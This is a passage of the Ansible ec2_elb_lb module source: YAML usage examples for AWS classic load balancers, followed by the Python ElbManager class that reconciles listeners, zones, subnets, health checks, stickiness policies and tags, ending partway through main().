listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
# Configure a health check and the access logs
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
health_check:
ping_protocol: http # options are http, https, ssl, tcp
ping_port: 80
ping_path: "/index.html" # not required for tcp or ssl
response_timeout: 5 # seconds
interval: 30 # seconds
unhealthy_threshold: 2
healthy_threshold: 10
access_logs:
interval: 5 # minutes (defaults to 60)
s3_location: "my-bucket" # This value is required if access_logs is set
s3_prefix: "logs"
# Ensure ELB is gone
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
# Ensure ELB is gone and wait for check (for default timeout)
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
wait: yes
# Ensure ELB is gone and wait for check with timeout value
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
wait: yes
wait_timeout: 600
# Normally, this module will purge any listeners that exist on the ELB
# but aren't specified in the listeners parameter. If purge_listeners is
# false it leaves them alone
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_listeners: no
# Normally, this module will leave availability zones that are enabled
# on the ELB alone. If purge_zones is true, then any extraneous zones
# will be removed
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_zones: yes
# Creates a ELB and assigns a list of subnets to it.
- amazon.aws.ec2_elb_lb:
state: present
name: 'New ELB'
security_group_ids: 'sg-123456, sg-67890'
region: us-west-2
subnets: 'subnet-123456,subnet-67890'
purge_subnets: yes
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with connection draining, increased idle timeout and cross availability
# zone load balancing
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
connection_draining_timeout: 60
idle_timeout: 300
cross_az_load_balancing: "yes"
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with load balancer stickiness enabled
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: loadbalancer
enabled: yes
expiration: 300
# Create an ELB with application stickiness enabled
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: application
enabled: yes
cookie: SESSIONID
# Create an ELB and add tags
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags:
Name: "New ELB"
stack: "production"
client: "Bob"
# Delete all tags from an ELB
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags: {}
"""
import random
import time
try:
import boto
import boto.ec2.elb
import boto.ec2.elb.attributes
import boto.vpc
from boto.ec2.elb.healthcheck import HealthCheck
from boto.ec2.tag import Tag
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_native
from ..module_utils.core import AnsibleAWSModule
from ..module_utils.ec2 import AnsibleAWSError
from ..module_utils.ec2 import HAS_BOTO
from ..module_utils.ec2 import connect_to_aws
from ..module_utils.ec2 import get_aws_connection_info
def _throttleable_operation(max_retries):
def _operation_wrapper(op):
def _do_op(*args, **kwargs):
retry = 0
while True:
try:
return op(*args, **kwargs)
except boto.exception.BotoServerError as e:
if retry < max_retries and e.code in \
("Throttling", "RequestLimitExceeded"):
retry = retry + 1
time.sleep(min(random.random() * (2 ** retry), 300))
continue
else:
raise
return _do_op
return _operation_wrapper
def _get_vpc_connection(module, region, aws_connect_params):
try:
return connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json_aws(e, 'Failed to connect to AWS')
_THROTTLING_RETRIES = 5
class ElbManager(object):
def __init__(self, module, name, listeners=None, purge_listeners=None,
zones=None, purge_zones=None, security_group_ids=None,
health_check=None, subnets=None, purge_subnets=None,
scheme="internet-facing", connection_draining_timeout=None,
idle_timeout=None,
cross_az_load_balancing=None, access_logs=None,
stickiness=None, wait=None, wait_timeout=None, tags=None,
region=None,
instance_ids=None, purge_instance_ids=None, **aws_connect_params):
self.module = module
self.name = name
self.listeners = listeners
self.purge_listeners = purge_listeners
self.instance_ids = instance_ids
self.purge_instance_ids = purge_instance_ids
self.zones = zones
self.purge_zones = purge_zones
self.security_group_ids = security_group_ids
self.health_check = health_check
self.subnets = subnets
self.purge_subnets = purge_subnets
self.scheme = scheme
self.connection_draining_timeout = connection_draining_timeout
self.idle_timeout = idle_timeout
self.cross_az_load_balancing = cross_az_load_balancing
self.access_logs = access_logs
self.stickiness = stickiness
self.wait = wait
self.wait_timeout = wait_timeout
self.tags = tags
self.aws_connect_params = aws_connect_params
self.region = region
self.changed = False
self.status = 'gone'
self.elb_conn = self._get_elb_connection()
try:
self.elb = self._get_elb()
except boto.exception.BotoServerError as e:
module.fail_json_aws(e, msg='Unable to get all load balancers')
self.ec2_conn = self._get_ec2_connection()
@_throttleable_operation(_THROTTLING_RETRIES)
def ensure_ok(self):
if not self.elb:
# Zones and listeners will be added at creation
self._create_elb()
else:
if self._get_scheme():
# the only way to change the scheme is by recreating the resource
self.ensure_gone()
self._create_elb()
else:
self._set_zones()
self._set_security_groups()
self._set_elb_listeners()
self._set_subnets()
self._set_health_check()
# boto has introduced support for some ELB attributes in
# different versions, so we check first before trying to
# set them to avoid errors
if self._check_attribute_support('connection_draining'):
self._set_connection_draining_timeout()
if self._check_attribute_support('connecting_settings'):
self._set_idle_timeout()
if self._check_attribute_support('cross_zone_load_balancing'):
self._set_cross_az_load_balancing()
if self._check_attribute_support('access_log'):
self._set_access_log()
# add sticky options
self.select_stickiness_policy()
# ensure backend server policies are correct
self._set_backend_policies()
# set/remove instance ids
self._set_instance_ids()
self._set_tags()
def ensure_gone(self):
if self.elb:
self._delete_elb()
if self.wait:
elb_removed = self._wait_for_elb_removed()
# Unfortunately even though the ELB itself is removed quickly
# the interfaces take longer so reliant security groups cannot
# be deleted until the interface has registered as removed.
elb_interface_removed = self._wait_for_elb_interface_removed()
if not (elb_removed and elb_interface_removed):
self.module.fail_json(msg='Timed out waiting for removal of load balancer.')
def get_info(self):
try:
check_elb = self.elb_conn.get_all_load_balancers(self.name)[0]
except Exception:
check_elb = None
if not check_elb:
info = {
'name': self.name,
'status': self.status,
'region': self.region
}
else:
try:
lb_cookie_policy = check_elb.policies.lb_cookie_stickiness_policies[0].__dict__['policy_name']
except Exception:
lb_cookie_policy = None
try:
app_cookie_policy = check_elb.policies.app_cookie_stickiness_policies[0].__dict__['policy_name']
except Exception:
app_cookie_policy = None
info = {
'name': check_elb.name,
'dns_name': check_elb.dns_name,
'zones': check_elb.availability_zones,
'security_group_ids': check_elb.security_groups,
'status': self.status,
'subnets': self.subnets,
'scheme': check_elb.scheme,
'hosted_zone_name': check_elb.canonical_hosted_zone_name,
'hosted_zone_id': check_elb.canonical_hosted_zone_name_id,
'lb_cookie_policy': lb_cookie_policy,
'app_cookie_policy': app_cookie_policy,
'proxy_policy': self._get_proxy_protocol_policy(),
'backends': self._get_backend_policies(),
'instances': [instance.id for instance in check_elb.instances],
'out_of_service_count': 0,
'in_service_count': 0,
'unknown_instance_state_count': 0,
'region': self.region
}
# status of instances behind the ELB
if info['instances']:
info['instance_health'] = [dict(
instance_id=instance_state.instance_id,
reason_code=instance_state.reason_code,
state=instance_state.state
) for instance_state in self.elb_conn.describe_instance_health(self.name)]
else:
info['instance_health'] = []
# instance state counts: InService or OutOfService
if info['instance_health']:
for instance_state in info['instance_health']:
if instance_state['state'] == "InService":
info['in_service_count'] += 1
elif instance_state['state'] == "OutOfService":
info['out_of_service_count'] += 1
else:
info['unknown_instance_state_count'] += 1
if check_elb.health_check:
info['health_check'] = {
'target': check_elb.health_check.target,
'interval': check_elb.health_check.interval,
'timeout': check_elb.health_check.timeout,
'healthy_threshold': check_elb.health_check.healthy_threshold,
'unhealthy_threshold': check_elb.health_check.unhealthy_threshold,
}
if check_elb.listeners:
info['listeners'] = [self._api_listener_as_tuple(l)
for l in check_elb.listeners]
elif self.status == 'created':
# When creating a new ELB, listeners don't show in the
info['listeners'] = [self._listener_as_tuple(l)
for l in self.listeners]
else:
info['listeners'] = []
if self._check_attribute_support('connection_draining'):
info['connection_draining_timeout'] = int(self.elb_conn.get_lb_attribute(self.name, 'ConnectionDraining').timeout)
if self._check_attribute_support('connecting_settings'):
info['idle_timeout'] = self.elb_conn.get_lb_attribute(self.name, 'ConnectingSettings').idle_timeout
if self._check_attribute_support('cross_zone_load_balancing'):
is_cross_az_lb_enabled = self.elb_conn.get_lb_attribute(self.name, 'CrossZoneLoadBalancing')
if is_cross_az_lb_enabled:
info['cross_az_load_balancing'] = 'yes'
else:
info['cross_az_load_balancing'] = 'no'
info['tags'] = self.tags
return info
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout // polling_increment_secs)
status_achieved = False
for x in range(0, max_retries):
try:
self.elb_conn.get_all_lb_attributes(self.name)
except (boto.exception.BotoServerError, Exception) as e:
if "LoadBalancerNotFound" in e.code:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_interface_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout // polling_increment_secs)
status_achieved = False
elb_interfaces = self.ec2_conn.get_all_network_interfaces(
filters={'attachment.instance-owner-id': 'amazon-elb',
'description': 'ELB {0}'.format(self.name)})
for x in range(0, max_retries):
for interface in elb_interfaces:
try:
result = self.ec2_conn.get_all_network_interfaces(interface.id)
if result == []:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
except (boto.exception.BotoServerError, Exception) as e:
if 'InvalidNetworkInterfaceID' in e.code:
status_achieved = True
break
else:
self.module.fail_json_aws(e, 'Failure while waiting for interface to be removed')
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _get_elb(self):
    """Find this module's load balancer by exact name match.

    Returns the boto ELB object and sets status to 'ok' when found;
    implicitly returns None when no ELB with this name exists.
    """
    elbs = self.elb_conn.get_all_load_balancers()
    for elb in elbs:
        if self.name == elb.name:
            self.status = 'ok'
            return elb
def _get_elb_connection(self):
    """Open a region-scoped boto ELB connection.

    Fails the module (and therefore never returns) on authentication or
    AWS connection errors.
    """
    try:
        return connect_to_aws(boto.ec2.elb, self.region,
                              **self.aws_connect_params)
    except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
        self.module.fail_json_aws(e, 'Failure while connecting to AWS')
def _get_ec2_connection(self):
    """Open a region-scoped boto EC2 connection; fail the module on error."""
    try:
        return connect_to_aws(boto.ec2, self.region,
                              **self.aws_connect_params)
    # NOTE(review): catching Exception is broader than the sibling
    # _get_elb_connection (which catches only auth/AWS errors) — confirm
    # whether the asymmetry is intentional.
    except (boto.exception.NoAuthHandlerFound, Exception) as e:
        self.module.fail_json_aws(e, 'Failure while connecting to AWS')
@_throttleable_operation(_THROTTLING_RETRIES)
def _delete_elb(self):
    """Delete the load balancer, recording changed/status on success."""
    # boto returns a truthy value when the delete call succeeded.
    result = self.elb_conn.delete_load_balancer(name=self.name)
    if result:
        self.changed = True
        self.status = 'deleted'
def _create_elb(self):
    """Create the load balancer with the configured listeners/zones/subnets."""
    # Pass listeners as complex tuples so instance protocol and SSL
    # certificate information survive the API round trip.
    listeners = [self._listener_as_tuple(l) for l in self.listeners]
    self.elb = self.elb_conn.create_load_balancer(name=self.name,
                                                  zones=self.zones,
                                                  security_groups=self.security_group_ids,
                                                  complex_listeners=listeners,
                                                  subnets=self.subnets,
                                                  scheme=self.scheme)
    if self.elb:
        # might be eventual consistency issues and it doesn't necessarily
        # reflect the requested listeners yet, so record locally what was
        # asked for rather than re-reading from the API.
        self.elb.listeners = self.listeners
        self.changed = True
        self.status = 'created'
def _create_elb_listeners(self, listeners):
    """Create the given listener tuples on the ELB.

    boto's return value indicates whether anything was created, and is
    stored directly in self.changed.
    """
    self.changed = self.elb_conn.create_load_balancer_listeners(self.name,
                                                                complex_listeners=listeners)
def _delete_elb_listeners(self, listeners):
ports = [l[0] for l in listeners]
self.changed = self.elb_conn.delete_load_balancer_listeners(self.name,
ports)
def _set_elb_listeners(self):
    """Reconcile the ELB's listeners with the requested configuration.

    Listeners are compared as normalized tuples; a listener whose port
    matches but whose other fields differ is removed and re-added (the
    ELB API has no in-place update).  Removal happens before addition so
    a port is never configured twice.
    """
    listeners_to_add = []
    listeners_to_remove = []
    listeners_to_keep = []

    for listener in self.listeners:
        listener_as_tuple = self._listener_as_tuple(listener)
        existing_listener_found = None
        for existing_listener in self.elb.listeners:
            # Match on the front-end port only; details are compared below.
            if existing_listener[0] == int(listener['load_balancer_port']):
                existing_listener_found = self._api_listener_as_tuple(existing_listener)
                break
        if existing_listener_found:
            # Does it match exactly?
            if listener_as_tuple != existing_listener_found:
                # The ports are the same but something else is different,
                # so we'll remove the existing one and add the new one
                listeners_to_remove.append(existing_listener_found)
                listeners_to_add.append(listener_as_tuple)
            else:
                listeners_to_keep.append(existing_listener_found)
        else:
            # We didn't find an existing listener, so just add the new one
            listeners_to_add.append(listener_as_tuple)

    # With purge_listeners, any existing listener that is neither kept nor
    # already slated for replacement gets deleted.
    if self.purge_listeners:
        for existing_listener in self.elb.listeners:
            existing_listener_tuple = self._api_listener_as_tuple(existing_listener)
            if existing_listener_tuple in listeners_to_remove:
                continue
            if existing_listener_tuple in listeners_to_keep:
                continue
            listeners_to_remove.append(existing_listener_tuple)

    if listeners_to_remove:
        self._delete_elb_listeners(listeners_to_remove)
    if listeners_to_add:
        self._create_elb_listeners(listeners_to_add)
def _api_listener_as_tuple(self, listener):
base_tuple = listener.get_complex_tuple()
if listener.ssl_certificate_id and len(base_tuple) < 5:
return base_tuple + (listener.ssl_certificate_id,)
return base_tuple
def _listener_as_tuple(self, listener):
# N.B. string manipulations on protocols below (str(), upper()) is to
# ensure format matches output from ELB API
listener_list = [
int(listener['load_balancer_port']),
int(listener['instance_port']),
str(listener['protocol'].upper()),
]
# Instance protocol is not required by ELB API; it defaults to match
# load balancer protocol. We'll mimic that behavior here
if 'instance_protocol' in listener:
listener_list.append(str(listener['instance_protocol'].upper()))
else:
listener_list.append(str(listener['protocol'].upper()))
if 'ssl_certificate_id' in listener:
listener_list.append(str(listener['ssl_certificate_id']))
return tuple(listener_list)
def _enable_zones(self, zones):
    """Enable the given availability zones; fail the module on API error."""
    try:
        self.elb.enable_zones(zones)
    except boto.exception.BotoServerError as e:
        self.module.fail_json_aws(e, msg='unable to enable zones')
    self.changed = True
def _disable_zones(self, zones):
    """Disable the given availability zones; fail the module on API error."""
    try:
        self.elb.disable_zones(zones)
    except boto.exception.BotoServerError as e:
        self.module.fail_json_aws(e, msg='unable to disable zones')
    self.changed = True
def _attach_subnets(self, subnets):
    """Attach the given subnets to the ELB and mark the module changed."""
    self.elb_conn.attach_lb_to_subnets(self.name, subnets)
    self.changed = True
def _detach_subnets(self, subnets):
    """Detach the given subnets from the ELB and mark the module changed."""
    self.elb_conn.detach_lb_from_subnets(self.name, subnets)
    self.changed = True
def _set_subnets(self):
if self.subnets:
if self.purge_subnets:
subnets_to_detach = list(set(self.elb.subnets) - set(self.subnets))
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
else:
subnets_to_detach = None
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
if subnets_to_attach:
self._attach_subnets(subnets_to_attach)
if subnets_to_detach:
self._detach_subnets(subnets_to_detach)
def _get_scheme(self):
if self.scheme:
if self.elb.scheme != self.scheme:
if not self.wait:
self.module.fail_json(msg="Unable to modify scheme without using the wait option")
return True
return False
def _set_zones(self):
if self.zones:
if self.purge_zones:
zones_to_disable = list(set(self.elb.availability_zones) -
set(self.zones))
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
else:
zones_to_disable = None
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
if zones_to_enable:
self._enable_zones(zones_to_enable)
if zones_to_disable:
self._disable_zones(zones_to_disable)
def _set_security_groups(self):
if self.security_group_ids is not None and set(self.elb.security_groups) != set(self.security_group_ids):
self.elb_conn.apply_security_groups_to_lb(self.name, self.security_group_ids)
self.changed = True
def _set_health_check(self):
    """Ensure the ELB's health check matches the module parameters.

    Compares field by field against boto's HealthCheck object and only
    pushes a new configuration when something actually differs.
    """
    if self.health_check:
        # Map module params onto the attribute names boto's HealthCheck uses.
        health_check_config = {
            "target": self._get_health_check_target(),
            "timeout": self.health_check['response_timeout'],
            "interval": self.health_check['interval'],
            "unhealthy_threshold": self.health_check['unhealthy_threshold'],
            "healthy_threshold": self.health_check['healthy_threshold'],
        }
        update_health_check = False
        # A brand-new ELB may not carry a health check object yet.
        if not self.elb.health_check:
            self.elb.health_check = HealthCheck()
        for attr, desired_value in health_check_config.items():
            if getattr(self.elb.health_check, attr) != desired_value:
                setattr(self.elb.health_check, attr, desired_value)
                update_health_check = True
        if update_health_check:
            self.elb.configure_health_check(self.elb.health_check)
            self.changed = True
def _check_attribute_support(self, attr):
    """Return True when the installed boto release models the given ELB
    attribute (used to gate features that need newer boto versions)."""
    return hasattr(boto.ec2.elb.attributes.LbAttributes(), attr)
def _set_cross_az_load_balancing(self):
    """Sync the CrossZoneLoadBalancing attribute with the module param."""
    attributes = self.elb.get_attributes()
    if self.cross_az_load_balancing:
        if not attributes.cross_zone_load_balancing.enabled:
            self.changed = True
        attributes.cross_zone_load_balancing.enabled = True
    else:
        if attributes.cross_zone_load_balancing.enabled:
            self.changed = True
        attributes.cross_zone_load_balancing.enabled = False
    # NOTE(review): the attribute is pushed to AWS unconditionally, even
    # when the value did not change — confirm whether this is intentional
    # (the call is idempotent, but it is an extra API request per run).
    self.elb_conn.modify_lb_attribute(self.name, 'CrossZoneLoadBalancing',
                                      attributes.cross_zone_load_balancing.enabled)
def _set_access_log(self):
    """Enable/disable and configure S3 access logging to match params.

    When access_logs is supplied, every differing field is updated and
    pushed in one modify call; when it is absent, logging is switched
    off if currently enabled.
    """
    attributes = self.elb.get_attributes()
    if self.access_logs:
        if 's3_location' not in self.access_logs:
            self.module.fail_json(msg='s3_location information required')

        # Map module params onto boto's AccessLogAttribute field names,
        # applying the documented defaults for prefix and interval.
        access_logs_config = {
            "enabled": True,
            "s3_bucket_name": self.access_logs['s3_location'],
            "s3_bucket_prefix": self.access_logs.get('s3_prefix', ''),
            "emit_interval": self.access_logs.get('interval', 60),
        }

        update_access_logs_config = False
        for attr, desired_value in access_logs_config.items():
            if getattr(attributes.access_log, attr) != desired_value:
                setattr(attributes.access_log, attr, desired_value)
                update_access_logs_config = True
        if update_access_logs_config:
            self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
            self.changed = True
    elif attributes.access_log.enabled:
        # No access_logs requested but logging is on: turn it off.
        attributes.access_log.enabled = False
        self.changed = True
        self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
def _set_connection_draining_timeout(self):
    """Enable/adjust or disable connection draining to match the param.

    A non-None timeout enables draining with that timeout (updating only
    when the current state differs); None disables draining if enabled.
    """
    attributes = self.elb.get_attributes()
    if self.connection_draining_timeout is not None:
        if not attributes.connection_draining.enabled or \
                attributes.connection_draining.timeout != self.connection_draining_timeout:
            self.changed = True
            attributes.connection_draining.enabled = True
            attributes.connection_draining.timeout = self.connection_draining_timeout
            self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
    else:
        if attributes.connection_draining.enabled:
            self.changed = True
            attributes.connection_draining.enabled = False
            self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
def _set_idle_timeout(self):
attributes = self.elb.get_attributes()
if self.idle_timeout is not None:
if attributes.connecting_settings.idle_timeout != self.idle_timeout:
self.changed = True
attributes.connecting_settings.idle_timeout = self.idle_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectingSettings', attributes.connecting_settings)
def _policy_name(self, policy_type):
    """Derive the module-managed policy name for the given policy type."""
    suffix = to_native(policy_type, errors='surrogate_or_strict')
    return 'ec2-elb-lb-%s' % suffix
def _create_policy(self, policy_param, policy_meth, policy):
    """Create an ELB policy by invoking the named boto method dynamically."""
    getattr(self.elb_conn, policy_meth)(policy_param, self.elb.name, policy)
def _delete_policy(self, elb_name, policy):
    """Delete the named policy from the given load balancer."""
    self.elb_conn.delete_lb_policy(elb_name, policy)
def _update_policy(self, policy_param, policy_meth, policy_attr, policy):
    """Replace a policy by deleting and recreating it (the ELB API offers
    no in-place policy update).

    policy_attr is unused here; kept for call-site compatibility.
    """
    self._delete_policy(self.elb.name, policy)
    self._create_policy(policy_param, policy_meth, policy)
def _set_listener_policy(self, listeners_dict, policy=None):
policy = [] if policy is None else policy
for listener_port in listeners_dict:
if listeners_dict[listener_port].startswith('HTTP'):
self.elb_conn.set_lb_policies_of_listener(self.elb.name, listener_port, policy)
def _set_stickiness_policy(self, elb_info, listeners_dict, policy, **policy_attrs):
    """Create or update a stickiness policy, then attach it to listeners.

    Scans the existing policies of the kind named by policy_attrs['attr'];
    if one with our managed name exists but its key parameter differs, it
    is detached, recreated, and re-attached.  The for/else creates the
    policy only when no match was found at all.
    """
    for p in getattr(elb_info.policies, policy_attrs['attr']):
        if str(p.__dict__['policy_name']) == str(policy[0]):
            # `param_value or 0` normalizes a None expiration to 0 for
            # comparison with the API-reported value.
            if str(p.__dict__[policy_attrs['dict_key']]) != str(policy_attrs['param_value'] or 0):
                # Detach before delete/recreate, then update the policy.
                self._set_listener_policy(listeners_dict)
                self._update_policy(policy_attrs['param_value'], policy_attrs['method'], policy_attrs['attr'], policy[0])
                self.changed = True
            break
    else:
        # No existing policy with our name: create it fresh.
        self._create_policy(policy_attrs['param_value'], policy_attrs['method'], policy[0])
        self.changed = True

    # (Re)attach the policy to all HTTP/HTTPS listeners.
    self._set_listener_policy(listeners_dict, policy)
def select_stickiness_policy(self):
    """Apply the requested stickiness configuration to the ELB.

    Supports two policy types: 'loadbalancer' (LB-cookie, keyed on an
    integer expiration) and 'application' (app-cookie, keyed on a cookie
    name).  Disabling removes the module-managed policy from listeners
    and deletes it.  No-op when no stickiness params were given.
    """
    if self.stickiness:
        # The two keys select different policy types, so both at once is
        # ambiguous.
        if 'cookie' in self.stickiness and 'expiration' in self.stickiness:
            self.module.fail_json(msg='\'cookie\' and \'expiration\' can not be set at the same time')

        # Build a port -> protocol map of the live listeners.
        elb_info = self.elb_conn.get_all_load_balancers(self.elb.name)[0]
        d = {}
        for listener in elb_info.listeners:
            d[listener[0]] = listener[2]
        listeners_dict = d

        if self.stickiness['type'] == 'loadbalancer':
            policy = []
            policy_type = 'LBCookieStickinessPolicyType'

            if self.module.boolean(self.stickiness['enabled']):
                if 'expiration' not in self.stickiness:
                    self.module.fail_json(msg='expiration must be set when type is loadbalancer')
                try:
                    # An expiration of 0 is mapped to None ("until browser
                    # close" semantics in the API).
                    expiration = self.stickiness['expiration'] if int(self.stickiness['expiration']) else None
                except ValueError:
                    self.module.fail_json(msg='expiration must be set to an integer')

                policy_attrs = {
                    'type': policy_type,
                    'attr': 'lb_cookie_stickiness_policies',
                    'method': 'create_lb_cookie_stickiness_policy',
                    'dict_key': 'cookie_expiration_period',
                    'param_value': expiration
                }
                policy.append(self._policy_name(policy_attrs['type']))
                self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
            elif not self.module.boolean(self.stickiness['enabled']):
                # changed only reflects whether the module-managed policy
                # was actually present before removal.
                if len(elb_info.policies.lb_cookie_stickiness_policies):
                    if elb_info.policies.lb_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
                        self.changed = True
                else:
                    self.changed = False
                self._set_listener_policy(listeners_dict)
                self._delete_policy(self.elb.name, self._policy_name(policy_type))

        elif self.stickiness['type'] == 'application':
            policy = []
            policy_type = 'AppCookieStickinessPolicyType'

            if self.module.boolean(self.stickiness['enabled']):
                if 'cookie' not in self.stickiness:
                    self.module.fail_json(msg='cookie must be set when type is application')

                policy_attrs = {
                    'type': policy_type,
                    'attr': 'app_cookie_stickiness_policies',
                    'method': 'create_app_cookie_stickiness_policy',
                    'dict_key': 'cookie_name',
                    'param_value': self.stickiness['cookie']
                }
                policy.append(self._policy_name(policy_attrs['type']))
                self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
            elif not self.module.boolean(self.stickiness['enabled']):
                if len(elb_info.policies.app_cookie_stickiness_policies):
                    if elb_info.policies.app_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
                        self.changed = True
                self._set_listener_policy(listeners_dict)
                self._delete_policy(self.elb.name, self._policy_name(policy_type))

        else:
            # Unknown stickiness type: just clear listener policies.
            self._set_listener_policy(listeners_dict)
def _get_backend_policies(self):
policies = []
if self.elb.backends is not None:
for backend in self.elb.backends:
if backend.policies is not None:
for policy in backend.policies:
policies.append(str(backend.instance_port) + ':' + policy.policy_name)
return policies
def _set_backend_policies(self):
    """Ensure backend (instance-port) ProxyProtocol policies match the
    listener configuration.

    For each listener, the ProxyProtocol-policy is attached to its
    instance port when proxy_protocol is requested and removed when it
    is present but no longer wanted.  The shared policy object itself is
    created first (if needed) so the attach calls cannot fail on a
    missing policy.
    """
    ensure_proxy_protocol = False
    replace = []
    backend_policies = self._get_backend_policies()

    for listener in self.listeners:
        want = False

        if 'proxy_protocol' in listener and listener['proxy_protocol']:
            ensure_proxy_protocol = True
            want = True

        if str(listener['instance_port']) + ':ProxyProtocol-policy' in backend_policies:
            if not want:
                # Present but no longer requested: clear the port's policies.
                replace.append({'port': listener['instance_port'], 'policies': []})
        elif want:
            # Requested but not yet attached.
            replace.append({'port': listener['instance_port'], 'policies': ['ProxyProtocol-policy']})

    if ensure_proxy_protocol:
        self._set_proxy_protocol_policy()

    for item in replace:
        self.elb_conn.set_lb_policies_of_backend_server(self.elb.name, item['port'], item['policies'])
        self.changed = True
def _get_proxy_protocol_policy(self):
if self.elb.policies is not None and self.elb.policies.other_policies is not None:
for policy in self.elb.policies.other_policies:
if policy.policy_name == 'ProxyProtocol-policy':
return policy.policy_name
return None
def _set_proxy_protocol_policy(self):
proxy_policy = self._get_proxy_protocol_policy()
if proxy_policy is None:
self.elb_conn.create_lb_policy(
self.elb.name, 'ProxyProtocol-policy', 'ProxyProtocolPolicyType', {'ProxyProtocol': True}
)
self.changed = True
def _diff_list(self, a, b):
b = set(b)
return [aa for aa in a if aa not in b]
def _get_instance_ids(self):
instances = []
if self.elb.instances is not None:
for instance in self.elb.instances:
instances.append(instance.id)
return instances
def _set_instance_ids(self):
    """Register/deregister EC2 instances to match the instance_ids param.

    Missing instances are always registered; existing instances are only
    deregistered when purge_instance_ids is set.
    """
    assert_instances = self.instance_ids or []

    has_instances = self._get_instance_ids()

    add_instances = self._diff_list(assert_instances, has_instances)
    if add_instances:
        self.elb_conn.register_instances(self.elb.name, add_instances)
        self.changed = True

    if self.purge_instance_ids:
        remove_instances = self._diff_list(has_instances, assert_instances)
        if remove_instances:
            self.elb_conn.deregister_instances(self.elb.name, remove_instances)
            self.changed = True
def _set_tags(self):
    """Add/remove tags so the ELB's tag set exactly matches self.tags.

    Uses the raw DescribeTags/AddTags/RemoveTags query API (boto2 has no
    higher-level tag helpers for ELB).  No-op when tags is None.
    """
    if self.tags is None:
        return

    params = {'LoadBalancerNames.member.1': self.name}
    tagdict = dict()

    # Fetch the current tags, keyed by tag name, when the ELB exists.
    if self.elb:
        current_tags = self.elb_conn.get_list('DescribeTags', params,
                                              [('member', Tag)])
        tagdict = dict((tag.Key, tag.Value) for tag in current_tags
                       if hasattr(tag, 'Key'))

    # Tags that are requested but missing or carrying a different value.
    dictact = dict(set(self.tags.items()) - set(tagdict.items()))
    if dictact:
        for i, key in enumerate(dictact):
            params['Tags.member.%d.Key' % (i + 1)] = key
            params['Tags.member.%d.Value' % (i + 1)] = dictact[key]

        self.elb_conn.make_request('AddTags', params)
        self.changed = True

    # Tags present on the ELB but not requested any more.
    # NOTE(review): params may still contain 'Tags.member.N.Value' entries
    # left over from the AddTags phase above — confirm the RemoveTags API
    # ignores them.
    dictact = dict(set(tagdict.items()) - set(self.tags.items()))
    if dictact:
        for i, key in enumerate(dictact):
            params['Tags.member.%d.Key' % (i + 1)] = key

        self.elb_conn.make_request('RemoveTags', params)
        self.changed = True
def _get_health_check_target(self):
protocol = self.health_check['ping_protocol'].upper()
path = ""
if protocol in ['HTTP', 'HTTPS'] and 'ping_path' in self.health_check:
path = self.health_check['ping_path']
return "%s:%s%s" % (protocol, self.health_check['ping_port'], path)
def main():
    """Ansible module entry point: parse params, reconcile the ELB, exit."""
    argument_spec = dict(
        state={'required': True, 'choices': ['present', 'absent']},
        name={'required': True},
        listeners={'default': None, 'required': False, 'type': 'list', 'elements': 'dict'},
        purge_listeners={'default': True, 'required': False, 'type': 'bool'},
        instance_ids={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
        purge_instance_ids={'default': False, 'required': False, 'type': 'bool'},
        zones={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
